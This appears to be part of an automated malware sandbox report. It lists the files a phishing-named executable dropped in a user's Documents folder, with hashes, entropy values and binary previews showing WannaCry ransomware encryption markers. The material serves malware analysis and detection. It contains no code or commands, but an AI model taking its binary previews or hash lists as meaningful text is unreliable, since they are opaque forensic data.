                                                          Preview:WANACRY!....@E...;..`}.).J...1..x.H.._Hq3{...p......x.=......:......Y`E..'I.....D..@..'..N.M.e.b{M.z._.&[sc{A..C...n..31.n....M.v.Y...i.q....zgzVNA......%Sr..JBi.O.....j|/e}..,...]L..R.:.AI!N...~.......xn.l..0.K..V9.`..\...E._...."...t.Z. ....5.f.3.-.`.............#..q..."$B..SF...L.....}.....4.....u...8..&........s.j......B..{....i[p...|..\...~.'K.../.LY.0.k.E.$d/...K..e...M....m..+=.1V.7..D...\...>...ND.......~Ihw........rB)T.Z]Ye.4...:.}....-./.....Cx.=..S...`...* ..{-{.:..+D..$.. .!...k.....C..`Is......#Sw.`..jHC=..C.f......Y..G.>...j^..U......J9l..<....^.A.._....i.:k.8.......>.....w.N.'. ....D..A........5.Z..l.....[.mh..*.%$..^..)@............_.@V.[.$$JW1f...]..~G......c..$?...1...Y..Ql.D@..6..*.^.....`..!.#...^QT.LQ...#...!...Iwz/t..8x.+z..f#..2..s...O.../......pR..{.....q.....Z.G"%<..W..... .T.A..$...F.........|..e....fD....'nNz.x.......r..`cs.&..*.h....m.G..J.p....C.w...M...\..=]....U.....L=.P3.tpYc.Fk7[.k...ho....Z.^..C

                                                          C:\Users\user\Documents\HMPPSXQPQV\HMPPSXQPQV.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.829938513677851
                                                          Encrypted:false
                                                          SSDEEP:24:bkldp3W+dv9XPhb9fenWrm5oORC2RF7Ko+bAUqmOWnKqi3UyaZld4ZOmIJaNBg9:bkliQlXDtrm1RDu7bAx4KqUUJZvOmyI
                                                          MD5:BBEA7305849ED494B4FE84CCBCB149B1
                                                          SHA1:4B6DEB044D7AAA93C9408174C3B1C21378FB8E7D
                                                          SHA-256:FC8765029321F306B0C01B3E02FC5A9E9D55E1C7625B4BA60742610FFECF2B45
                                                          SHA-512:F89A1594860A6AF7343840C82F84082B6DD51CE908AB1817FC61D7C07F26312B5C15B9D3B3C6E95BA2E4C5AA41F37317191AE90957FC3613F31745AD697A69B9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....@E...;..`}.).J...1..x.H.._Hq3{...p......x.=......:......Y`E..'I.....D..@..'..N.M.e.b{M.z._.&[sc{A..C...n..31.n....M.v.Y...i.q....zgzVNA......%Sr..JBi.O.....j|/e}..,...]L..R.:.AI!N...~.......xn.l..0.K..V9.`..\...E._...."...t.Z. ....5.f.3.-.`.............#..q..."$B..SF...L.....}.....4.....u...8..&........s.j......B..{....i[p...|..\...~.'K.../.LY.0.k.E.$d/...K..e...M....m..+=.1V.7..D...\...>...ND.......~Ihw........rB)T.Z]Ye.4...:.}....-./.....Cx.=..S...`...* ..{-{.:..+D..$.. .!...k.....C..`Is......#Sw.`..jHC=..C.f......Y..G.>...j^..U......J9l..<....^.A.._....i.:k.8.......>.....w.N.'. ....D..A........5.Z..l.....[.mh..*.%$..^..)@............_.@V.[.$$JW1f...]..~G......c..$?...1...Y..Ql.D@..6..*.^.....`..!.#...^QT.LQ...#...!...Iwz/t..8x.+z..f#..2..s...O.../......pR..{.....q.....Z.G"%<..W..... .T.A..$...F.........|..e....fD....'nNz.x.......r..`cs.&..*.h....m.G..J.p....C.w...M...\..=]....U.....L=.P3.tpYc.Fk7[.k...ho....Z.^..C

                                                          C:\Users\user\Documents\HMPPSXQPQV\HQJBRDYKDE.jpg

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812807498961308
                                                          Encrypted:false
                                                          SSDEEP:24:iw32IUQJeL0Uy9xNPoH84bwavN+EwSfMaG8:iQ2Iq0Uy9xhcDbw6RjfMaG8
                                                          MD5:210167F483BBD3BFA15FA6AD84AA3769
                                                          SHA1:E27FDA35002F597F03C7F30DF0A0EEFD130E8EFD
                                                          SHA-256:848593B73A0D7F3105A7624F98EB1B6F77AC7D8B3608667028C9E55DCF4EA94C
                                                          SHA-512:DC799BF43EBFDA81D023425A7A862D3A99D44BF9D0F29D4EAF5B597E739D3FAA6890C58062A191A9D0746203574AD0391E312FC344554E54C4A4827F8E8ECCCB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..J....^..%t...Q......]...;....f...ibb...t.6E....[..3~`%.*....h.t............ Z.,....c.v.%.. .s...f..],.. ...c45.d....P...:P.....6.^.\....].......m...~...vV......('.P(?.n.[..*`.sK...-O...........4...2./-..^.*........1.VE.L#..F.....X..nj.x7.....R.o...a.,.....Z..'...w..N..J.]Q.S ...*.6............`...@C.../...:.....R..n.$.\..j.J..$.K....4....3.q. 0.x...0...B.E.={.k.7.O.J+..m..u...'.....*.Rs.u+.}H(w.z.....; E.}FGU...6..x._...=i...?...|r...t;.u... .I.n..0..,:... ..E.-....!*..*.>..-.UY...H...T..E./..m6j..B).v%..r&u...../...._.0.(..>j.Qh..p..b..."|(.#.)...-.y.....}$,.;...J}._...|...gQ.w}.....\.N76.z....OX.......d\..OL)..... .?....Z.........P]d....j....f......fP...JZ.9..u,DA.b.....R./H+p..LJ.Jpx.9<..O*.t*.K.`..8L..q...?6..m;..|......&\..n..(.kHC.U..o.vB....|.6..R...e_v....>.....m..../..jG....N.|Jl.M....|.(.........g4.].K...]w.<...=D.i...VT.U.g...I.\...w...kM.k.....hNq.9.5...Y...k....2.....^FR..jO...[|.z.Tj....(...!.......9.2=.....n2.-~..$..9..V

                                                          C:\Users\user\Documents\HMPPSXQPQV\HQJBRDYKDE.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8634175197376095
                                                          Encrypted:false
                                                          SSDEEP:24:bkRt/XfZ+Nra5xTQRdwfh1zldLqxgA2EQMmZHIQMsnCmAUyTvImS6SDlzI:bkRlB+U5xTadwfh1zlgxjkJasCm6vInK
                                                          MD5:073D7CB92EEA56BBF696546403AFA873
                                                          SHA1:2B627DEB8AD4FF25FDA7D88EDB45BD971D46A180
                                                          SHA-256:644284C6112FE9100C69873D514CA7F902793774200160D094ADC7DA66979574
                                                          SHA-512:3359A7DCA20F904D8FD0FE9252BAA233F4046EA028A56578913D9114353929F1E3157B3DC5843F360665CBC2BE057FE46E85F32E08A4BDB2A3C9845D4B7D33CF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....8.!o..{..4O..=Q;..G..2..,W@.9!. .wX.`..^..U.0.M.^.........*.P...&..W..p..._m..t..a............v....M...s@k....8Z.R~.{....k..n$..3.zv.X[..2,&....=.{....Q...J.._.w...t..~../L-*...{8.No..DF7..h...A..Dppp.V.ca..z....j)...[.8M{.t..b.....h.\.7]~...j..............n......w.,.'....oe]..`.Uk...LZ...y...$.L..|L.....9....x.V.?3....E.._.....8.,pdc...H.B..:+..h.K.&&...@I...M.?wS..\\..J6.5.l.a+.*.....Un.D.......7.*............ O.o..O &.:r.}'7.I..*.U..,~..n..I.....w}lCr....Q.K9..]..,:.4.7PG._E.]O.....2..t#..N.........7.$%..'...5zl....`.=..p...+_...x.|......}..&lK....WnkU.p.3.5..(.w.L.t._..eT...6S,(..~. ....+...NMAv....-.b.x>.xT.OF@w.8i..U?.....t*q.nV...i.....P2.-.a.P...jt....a....H..Y.Q.u.#"y...p_.R=Du.^.E....%.%eQ2f.....PY0...f...8....|....b..(..U..j...3.ww...,.%......V...D...H.]I.`<..0.J..f.K..M...h.*Mr+Gv.....EkCr..+..|..t.c..h.....h....g6$.>..`3+5.....Bf..-..Z..E.F.#.6......3...].IG...!...".G.I.q..5t.|..&fp.>-.$..:...BO.C.....

                                                          C:\Users\user\Documents\HMPPSXQPQV\HQJBRDYKDE.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8634175197376095
                                                          Encrypted:false
                                                          SSDEEP:24:bkRt/XfZ+Nra5xTQRdwfh1zldLqxgA2EQMmZHIQMsnCmAUyTvImS6SDlzI:bkRlB+U5xTadwfh1zlgxjkJasCm6vInK
                                                          MD5:073D7CB92EEA56BBF696546403AFA873
                                                          SHA1:2B627DEB8AD4FF25FDA7D88EDB45BD971D46A180
                                                          SHA-256:644284C6112FE9100C69873D514CA7F902793774200160D094ADC7DA66979574
                                                          SHA-512:3359A7DCA20F904D8FD0FE9252BAA233F4046EA028A56578913D9114353929F1E3157B3DC5843F360665CBC2BE057FE46E85F32E08A4BDB2A3C9845D4B7D33CF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....8.!o..{..4O..=Q;..G..2..,W@.9!. .wX.`..^..U.0.M.^.........*.P...&..W..p..._m..t..a............v....M...s@k....8Z.R~.{....k..n$..3.zv.X[..2,&....=.{....Q...J.._.w...t..~../L-*...{8.No..DF7..h...A..Dppp.V.ca..z....j)...[.8M{.t..b.....h.\.7]~...j..............n......w.,.'....oe]..`.Uk...LZ...y...$.L..|L.....9....x.V.?3....E.._.....8.,pdc...H.B..:+..h.K.&&...@I...M.?wS..\\..J6.5.l.a+.*.....Un.D.......7.*............ O.o..O &.:r.}'7.I..*.U..,~..n..I.....w}lCr....Q.K9..]..,:.4.7PG._E.]O.....2..t#..N.........7.$%..'...5zl....`.=..p...+_...x.|......}..&lK....WnkU.p.3.5..(.w.L.t._..eT...6S,(..~. ....+...NMAv....-.b.x>.xT.OF@w.8i..U?.....t*q.nV...i.....P2.-.a.P...jt....a....H..Y.Q.u.#"y...p_.R=Du.^.E....%.%eQ2f.....PY0...f...8....|....b..(..U..j...3.ww...,.%......V...D...H.]I.`<..0.J..f.K..M...h.*Mr+Gv.....EkCr..+..|..t.c..h.....h....g6$.>..`3+5.....Bf..-..Z..E.F.#.6......3...].IG...!...".G.I.q..5t.|..&fp.>-.$..:...BO.C.....

                                                          C:\Users\user\Documents\HMPPSXQPQV\LHEPQPGEWF.png

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.8163487633396285
                                                          Encrypted:false
                                                          SSDEEP:24:sfwySVOetAJ6NIHyV5X4nMp0W1vjZhd7Cqh0RK:sfHSYMvmyV59p0WFZ/MK
                                                          MD5:D0242B3519D7DEBF6D774431BE4B6554
                                                          SHA1:EA80BA05A7EC017AFE5C2DD8947C36250D7373E0
                                                          SHA-256:10374A847DEC3BE5C5F190629FE552F8AD647F602AAA081E5D91FC182631BDE4
                                                          SHA-512:3587F6CAE516C5558D70E2D3D0975131B052446E2DA42E128E9CF242DF2649321621BF7E6FBB077F76AC5E78D91CC3035955F3AC2423EE52BF854081359F8FF5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:......UIHH.Ue...,..........*5P....R.D.F87~&l...R.q.o......f...#......`(.....a:..}.......7{...i...KDy........y.~.]./.qx.\.f..J..<......#.D3K..|.u...6L......i={r(l..:G......#....P...o..-.#B..*.M{......^.."_.E...A.....u.B.].@..........rqW.H.c.....~..z.;.D..@..w......`..c..dZ+..5......:c.1..Q... u.j{..Sl..E.8_.6..t.8...l.D.....$......dJ0.m`.3.n:.X.....8.,...u....Y.u.....]m.. ).8.....S..6..>..T...R....7.(.....O.C....9..v..;..C...4...g.r7.V...m.0..H*.......8...(..{..>..=.....{...1..I3R.f.<:fc.~..2<s..u......N.0...n.T.TW..#.m..{.2..V..bMO+Lc.A.:....&....6.m83.YH.....F..t\;}[...)..;.w..2)...V..d.m...b.~*A..|.1=.,UE...m...NY|..x..x!q..<....|.zS..}D..j..d.Iv...Tq.1.@|6l.s.c}...S.$.89..bu....k\;.w.b...'.>\....Pyz.]..6...!..u.d....tJ]...bM..p.{;Xi.;X.p.....(...vht]....Jo.`....A......s.KNm5..tI....$...&......2....$....K'...I0_!IJ.XEi.....}.....d...h....+...b`...q.2..iA._y*,.T.........B~c...k.......>.c$R[.n2Y......D.w...f...e.MMy...$...;.:_:h...gw...2.

                                                          C:\Users\user\Documents\HMPPSXQPQV\LHEPQPGEWF.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.857581383952584
                                                          Encrypted:false
                                                          SSDEEP:24:bk2o6U9g5Y4+pjgD9etczoPal7Id/+B7s6oVaxRjjt2ACYgFuFcOL+vVMzX:bk2cgApExetgoP07IMB46AaxRjjt47Fo
                                                          MD5:77F0380D9E70283F03733FAB4BAAE747
                                                          SHA1:F6BCEEC5A791A9A309B9FE5D167AD92D029A245F
                                                          SHA-256:46F8355642A1B3F36178AD35BFE070C2D6E1AD5E285401926DD636F8EF25BCEE
                                                          SHA-512:77D4CBF9AD669A528CA701338D14BF665EB2E3D4D63BE789E05EF9B787B3548365A9A1277CCAF3FD71BEE0EB43F6B4AA6C5AF90A51EA3FE6A9770F730982D804
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....F.W....d.{..y?.N\..b..A..;O~....5.3.-d..g\..H.pK{j...-R%....B..T.u..h..P...1..de....$..F.P-.,..".{...@..i..`.+.).8...]Aj.....9.V@..F..-k........dx.9......&...@.@...........P.P......'......V..x.u.Xp.!.ew......"a.9G.c..w...e.5e+.....C.....DL..A..............1......[.w.......@.`xN\...P@ .3..N6Qp...7..qK.%....L&a.._ju_.O.7..4]k.5b.9..iKPd,[.:......RM.........6.#..H.j'.e......CaUJ.=..h.4.:..#...$p..@~..8.Mm..#.......g...#.. ~'/..m....vc($.5.d...*G.........a..1Rc.......L..T@..3&....h.p...1..v..p.z_..DF..9l..t....?r...).Uj.(..fm#t....\*........3y...c..........'f....u.R...<`.."`.j>..^(*.s..7.Q.L:*$.F...m^.Ys6%....x.&....{*...wL..H..;...bl..8...'.!...#.f..,....y.=q....Mml......./.)..o!.C._f_... ....h8..d...I.F.....~.d.P........e.$)f.......2'.E@.....I<.......>.....fJ.Cq..g./..w../@.......^... .L..4.U.<.G..IGL..x>...3............x/^..E.mk....R...9...N/.j..T.i. .4..p.yX...!/...x...tC<..w...."...Q..t.a.6d.`G7.^0T....2..E...v

                                                          C:\Users\user\Documents\HMPPSXQPQV\LHEPQPGEWF.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.857581383952584
                                                          Encrypted:false
                                                          SSDEEP:24:bk2o6U9g5Y4+pjgD9etczoPal7Id/+B7s6oVaxRjjt2ACYgFuFcOL+vVMzX:bk2cgApExetgoP07IMB46AaxRjjt47Fo
                                                          MD5:77F0380D9E70283F03733FAB4BAAE747
                                                          SHA1:F6BCEEC5A791A9A309B9FE5D167AD92D029A245F
                                                          SHA-256:46F8355642A1B3F36178AD35BFE070C2D6E1AD5E285401926DD636F8EF25BCEE
                                                          SHA-512:77D4CBF9AD669A528CA701338D14BF665EB2E3D4D63BE789E05EF9B787B3548365A9A1277CCAF3FD71BEE0EB43F6B4AA6C5AF90A51EA3FE6A9770F730982D804
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....F.W....d.{..y?.N\..b..A..;O~....5.3.-d..g\..H.pK{j...-R%....B..T.u..h..P...1..de....$..F.P-.,..".{...@..i..`.+.).8...]Aj.....9.V@..F..-k........dx.9......&...@.@...........P.P......'......V..x.u.Xp.!.ew......"a.9G.c..w...e.5e+.....C.....DL..A..............1......[.w.......@.`xN\...P@ .3..N6Qp...7..qK.%....L&a.._ju_.O.7..4]k.5b.9..iKPd,[.:......RM.........6.#..H.j'.e......CaUJ.=..h.4.:..#...$p..@~..8.Mm..#.......g...#.. ~'/..m....vc($.5.d...*G.........a..1Rc.......L..T@..3&....h.p...1..v..p.z_..DF..9l..t....?r...).Uj.(..fm#t....\*........3y...c..........'f....u.R...<`.."`.j>..^(*.s..7.Q.L:*$.F...m^.Ys6%....x.&....{*...wL..H..;...bl..8...'.!...#.f..,....y.=q....Mml......./.)..o!.C._f_... ....h8..d...I.F.....~.d.P........e.$)f.......2'.E@.....I<.......>.....fJ.Cq..g./..w../@.......^... .L..4.U.<.G..IGL..x>...3............x/^..E.mk....R...9...N/.j..T.i. .4..p.yX...!/...x...tC<..w...."...Q..t.a.6d.`G7.^0T....2..E...v

                                                          C:\Users\user\Documents\HMPPSXQPQV\NIRMEKAMZH.mp3

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7993485033063426
                                                          Encrypted:false
                                                          SSDEEP:24:iuOt/cNfdPcecHrIK5b6XFh0dVPVVNYyY/OUDkU:fM/cN1UecLIqb6XFWHP+yY/OUQU
                                                          MD5:608203364342812ED5FAED87A7F3B3C8
                                                          SHA1:EC2CDC4FEE3895B88E46E1B87EE0712FBF7604E6
                                                          SHA-256:5BAD441A5E3AE85FD3435CC095CD40C55D856BFB0FF7A572151F0BC3F200592A
                                                          SHA-512:068BBF9C2287550954C49F46222DB307FEC2912F3F1B61C3836D8EC1953CD7E62B7885C262D48BF398E48413C7198C8C1D0C504155F2AB26FA88EBEAFAD83D36
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..Jd!..U..e..*.....@!.C.. Y'.?b..p...5.W.Mf.a....{.......J..BS.$,X..w.k..<C...w...F.Svx...2Ms)6.]%.P..bi6k{/1..4..P0.......<..q.X1.-..qJ}Fw..5.....YL=tk Cmm8=S..7......]`.<.A.#..A.e......ay.5...$3...<p....S7a.+......./t.|.BQ.j......Bb.;.W.zx....H.=.L ....FMh.^3c6EW.*>u!..ZR.S..?.`..].:N...G.R@..e.q..-..9G_<.9.......Ka..j5..M.u....5..]d5.. ...,...nd..z.....rW.,G8=...[`u...".....8.}...8....:..(.W%.a.c....EZ....*w......6..R.RnZ.I.....#..}...w..........Q....b0.&.h...1.-..D.......O......f....$....U..=)f@...6pVU.}....@.o.{.v.s........A..i_3:..d_....1].q..U.wK.......2@..[......:Bfli..........q.<...#}..3_.3..j..'.....)..D.*.....z.M..%..u.Epl.......s..XL..k..A!"..>.......4J..... ,/,,....).*%...M.Q....4..e..w..._Axj..Te..fkOY.....B0..fLm.....".^..0w..zb.........%...e'(..O"v..{.X..V=..)f@./MV.....QI..!..&&....(L}k..D.=.?}l........<....kY.)SS....K.4..v.-..i.e.....#.^k....a..G..s.q..m...:..fyc....k(.|y&......^..U.].~.V....R_WI...,..*....w.74..+

                                                          C:\Users\user\Documents\HMPPSXQPQV\NIRMEKAMZH.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.832585892575282
                                                          Encrypted:false
                                                          SSDEEP:24:bkzbPQkDlu65AhY8PbIRfbl0kqTHX5G0FiCOyPKYhOG1Wz0NaeaGbxQ:bkzbPQkDo6598Pgl0kqDsldyP8Rual
                                                          MD5:984DFF9876A4CD0A445F4AF6D7C45C0D
                                                          SHA1:7D3887742FA52948352E65B607650C4335370F4B
                                                          SHA-256:36086F5DABA20CD036D0E4DDAC83E04E7BFE03808C9F0611ABB3773DD288C901
                                                          SHA-512:9DF792BE0E7E572E6AFC5A12729869A67BE16AC5D64AE63220FB892A2F670B735295BDFF569912055AD12714A3D26040B3F71E867DF19CC1710325DE929AF7DE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....%.!.}.!..k....C...}/C.{.....keL..yy.)w1bEB..A.8..{........1P.<MF.o s.7.H.......<.........|...........e4g..l.R.s.......~.j.U..aG.jz...K._.?...U...r.`....d#.f.r.........NW%..*.....3%Hv....7...F...._....Z...,../..!H..+.w.b.&.r.j...Dc.G*.z.Pg..............K.&c2..P"vw.*)7..m1.@}6....JdE.@...y3....d..fJ...<P$....]4.H_.e\.{...1E....\.^6..viY..{I.2.nR.....L.[K.0...u~.c]....*\...O.....7t....T..xg7r....6.......l....!.J..6.2.....3rA....00..r.C.M....z.O.=j.Hk....~nF)&RF...:.A.i..3|...1%....EN..GI.......G.4.J.Z.B..w\.\.(..'l,..:...RF..!.O...._1Y.b..8...M162UA.,~.(.p.|....S2...M.Ky+..<.._.)*.C..2u...3..f.!.1.1.3Y.d.un.z.*.v..$........={.!....... &.....n`.......P.T...%1...A.#E...pg'...',..*.....g.7..F..3..xF._ .d..C.BK.N._(+s...n...B.M..0..^j....Yx.4.5..gx...fu..jU....=..>.l{0.U.c.).........H.<B.B.sM 0.T...Ta.........X-#.V.Ji.....N.b....G.F/he..X;x....E.......U...K3....'.y.5...F.J....`.\.".Y.!.54......_....^..a..ar..7.A.L.}^.>qx..r&.

                                                          C:\Users\user\Documents\HMPPSXQPQV\NIRMEKAMZH.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.832585892575282
                                                          Encrypted:false
                                                          SSDEEP:24:bkzbPQkDlu65AhY8PbIRfbl0kqTHX5G0FiCOyPKYhOG1Wz0NaeaGbxQ:bkzbPQkDo6598Pgl0kqDsldyP8Rual
                                                          MD5:984DFF9876A4CD0A445F4AF6D7C45C0D
                                                          SHA1:7D3887742FA52948352E65B607650C4335370F4B
                                                          SHA-256:36086F5DABA20CD036D0E4DDAC83E04E7BFE03808C9F0611ABB3773DD288C901
                                                          SHA-512:9DF792BE0E7E572E6AFC5A12729869A67BE16AC5D64AE63220FB892A2F670B735295BDFF569912055AD12714A3D26040B3F71E867DF19CC1710325DE929AF7DE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....%.!.}.!..k....C...}/C.{.....keL..yy.)w1bEB..A.8..{........1P.<MF.o s.7.H.......<.........|...........e4g..l.R.s.......~.j.U..aG.jz...K._.?...U...r.`....d#.f.r.........NW%..*.....3%Hv....7...F...._....Z...,../..!H..+.w.b.&.r.j...Dc.G*.z.Pg..............K.&c2..P"vw.*)7..m1.@}6....JdE.@...y3....d..fJ...<P$....]4.H_.e\.{...1E....\.^6..viY..{I.2.nR.....L.[K.0...u~.c]....*\...O.....7t....T..xg7r....6.......l....!.J..6.2.....3rA....00..r.C.M....z.O.=j.Hk....~nF)&RF...:.A.i..3|...1%....EN..GI.......G.4.J.Z.B..w\.\.(..'l,..:...RF..!.O...._1Y.b..8...M162UA.,~.(.p.|....S2...M.Ky+..<.._.)*.C..2u...3..f.!.1.1.3Y.d.un.z.*.v..$........={.!....... &.....n`.......P.T...%1...A.#E...pg'...',..*.....g.7..F..3..xF._ .d..C.BK.N._(+s...n...B.M..0..^j....Yx.4.5..gx...fu..jU....=..>.l{0.U.c.).........H.<B.B.sM 0.T...Ta.........X-#.V.Ji.....N.b....G.F/he..X;x....E.......U...K3....'.y.5...F.J....`.\.".Y.!.54......_....^..a..ar..7.A.L.}^.>qx..r&.

                                                          C:\Users\user\Documents\HMPPSXQPQV\QFAPOWPAFG.pdf

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.79774463592345
                                                          Encrypted:false
                                                          SSDEEP:24:soKX9TyCtuHGuqdwlPmlv3fovmDAaykc0crC/k78VO5:sX9ptumElPsv3fo+DHbcrC/CG4
                                                          MD5:9FBCF1C52751A4AD88F188E99BE02E73
                                                          SHA1:1A8393556D7C6B21C8852C4515B987FB4ED5ED42
                                                          SHA-256:4EFA7AF968DFC95E022EED232E158965A5412266069B6FD3D63121C8EF136CF8
                                                          SHA-512:6742B364F6903DF8AD8887528F854E88520F4AFFBC1BF4816DA8B4369AF4EA7ECEDC550FF5E36F76242F67010FCC805DA0A3FEDA4363C64D1DEF61F7A9C738AE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/..f..,.w...c.........4..}Vwq.`..<.k.#.:.....{....c)....u.ZW!N..WebGC..87.810...{%..=..3.~.-..:.....Z5...H...\.\...^fdf.b..iz.qgJ.].R,Q.6...V.|....Rr.o../.....Ho.z..#..L.....\L./.....Qt.`..S..#...d..4cf*/....zW....a..J->.`..J.W....../..j>.C.}.&.'d......_...o.lI.o7R....y...8.|.P.u..'.E.H....W....xV.:.........;......c^..z..X..h.;.1{UF4W...*..~..2.....[Y..2. .*....W.IKH...a.....#sU.U..c...YS.c..0...Q......H/...)..@.*q.Yz...N~...v.s..4...x4..6.BA.A=.t.F.f6g..&...&V).x....Uq.V.....xss. ..<G..f).J....3#.....OT)4.>,Sz%....Z.?..e..H..M..0.-R4.R.O...... ./....."....n..y.m.0.....l.Of...Z.RB...86@.G.%b.aJ;..........3,..;...... .Y...........D.6.i...e+Yf...I....<...M?qedm...3x......LM.u.(...h...|.....[.j.M...q.F...3..^.6.9..Z.3~-n..7.v"..\.=^....E*..|...F.l......bDC....F.....v..X..........F...,4......2...g8,7..qj..R...s....m.9..U.D...S..`.......d...E+..<'...Bna..c.=|.e.....`...T.....R....,...`^..0._q.|.J2...I...4....q.(Je......,.s-..ep.. ....%..:lst.O.

                                                          C:\Users\user\Documents\HMPPSXQPQV\QFAPOWPAFG.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.851548870331197
                                                          Encrypted:false
                                                          SSDEEP:24:bkdaMJ41Qh3fCq2+gDe2lt96/R0YwNl9cwmcQ7C:bkdaMJ4yhqaW96J0YwHeA
                                                          MD5:F7AFA1236F29247F064698088E696D65
                                                          SHA1:AE67C285E6E9DFF10D0F7921597595F54A723715
                                                          SHA-256:514A9164F993387FB2CDD74FACBB28B7916869BB05AE2D53E1963456BA0518D7
                                                          SHA-512:A07D339AB2A73E96B19370475E2652738BA24F239FF75E4609803667235E35ABF052EFC1995D2D87194D17867F89930BB8ABB88295D06F4879E779BD8515C6E1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....:._z#|.ap.mFO....S.T.....`(..F..|M3...1..;..w..6...0.1..{:..e.6...M...P;(F.......L..@.up..;.%....7.......p.E......k.NA...?......xVGM.hw...<.R...&.#=.....r67._.SO+..-..F........<e..5...V~.r....c.%.i.ZG..."-...E.Pn.yVm...x.q..+....6..z.zN......u..%............f. ..>.e....Y..R..b.<VI.x...x..r..... ~)o...9....@T...S.}7..C%vEnz.AD..KM.......o...v..j+m.r&.1.g.n...V.{.N.S..3Vl.O..0.W..[.t........7....^u].{r,2..e.Ej...`.R/.@=PU..q....S.y......V*...B5..s.x\.@..............h....I....Oe.h[.n.?.....2..+..].......MR.).T._.L...j..W!.........Ee....l.......tZd.$....a...........T.5..9n4P.=.....3.....K..TH.HL.BU..3Z....|.....~.bhw.....}3z...wLdC-..M..$.......<.3L......!.\x{......:.....H.]...y.....~.......l.:....u}...g+.L..7e.....I..8....r.~.?`)'8.~?.2..S.p...L.._...6.....V?y.O...0...Z-...j...o.w!C.........0......+.J.r.p..nveZ.K.../2.U0..C)H5....Q".......f...Ns..y..p|.1..%A...0...)F.*!j..3;...@.....B...7.F....Zy56.F.....^....[!...)..C..r

                                                          C:\Users\user\Documents\HMPPSXQPQV\QFAPOWPAFG.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.851548870331197
                                                          Encrypted:false
                                                          SSDEEP:24:bkdaMJ41Qh3fCq2+gDe2lt96/R0YwNl9cwmcQ7C:bkdaMJ4yhqaW96J0YwHeA
                                                          MD5:F7AFA1236F29247F064698088E696D65
                                                          SHA1:AE67C285E6E9DFF10D0F7921597595F54A723715
                                                          SHA-256:514A9164F993387FB2CDD74FACBB28B7916869BB05AE2D53E1963456BA0518D7
                                                          SHA-512:A07D339AB2A73E96B19370475E2652738BA24F239FF75E4609803667235E35ABF052EFC1995D2D87194D17867F89930BB8ABB88295D06F4879E779BD8515C6E1
                                                          Malicious:false
                                                          Reputation:unknown
